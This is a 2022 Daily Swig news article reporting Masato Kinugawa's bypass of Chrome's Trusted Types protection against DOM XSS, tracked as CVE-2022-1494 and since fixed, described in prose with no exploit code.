Untrusted types: Researcher demos trick to beat Trusted Types protection in Google Chrome

John Leyden 27 June 2022 at 15:25 UTC

Flaws in protection mechanism leaves websites more exposed to DOM XSS-based attacks

Security researchers have uncovered multiple unprotected properties to bypass Trusted Types, a widely used web security mechanism, in some scenarios.

Trusted Types is an important technology that allows websites to define strict rules on handling various DOM (Document Object Model) properties, a useful technique in guarding against DOM-based cross-site scripting (XSS) attacks.

A bypass discovered by well-known researcher Masato Kinugawa uses attribute properties to bypass the protection that Trusted Types would normally offer.

If a site was to use these properties and was vulnerable to DOM XSS then Trusted Types would not protect it, Kinugawa found. If a site modified an existing attribute value via nodeValue/textContent, as explained in a post on a Chrome security mailing list, then Trusted Types would ignore the assignment completely.

Catch up on the latest browser-related security news and analysis

The vulnerability was demonstrated in Chrome v100.0.4892.0 (Official Build) canary (64-bit). Other versions of Chrome and other browsers may be vulnerable, but this has not been tested.

The latest versions of Chrome address the problem.

The vulnerability – tracked as CVE-2022-1494 and said to involve “insufficient data validation in Trusted Types” – was first reported on February 16 but details were only publicly released last week.

The Daily Swig contacted both Kinugawa and Krzysztof Kotowicz, the Google software engineer who created Trusted Types, for comment. No word back, as yet, but we’ll update this story as and when more information comes to hand.

RELATED Google checks rise of DOM XSS with Trusted Types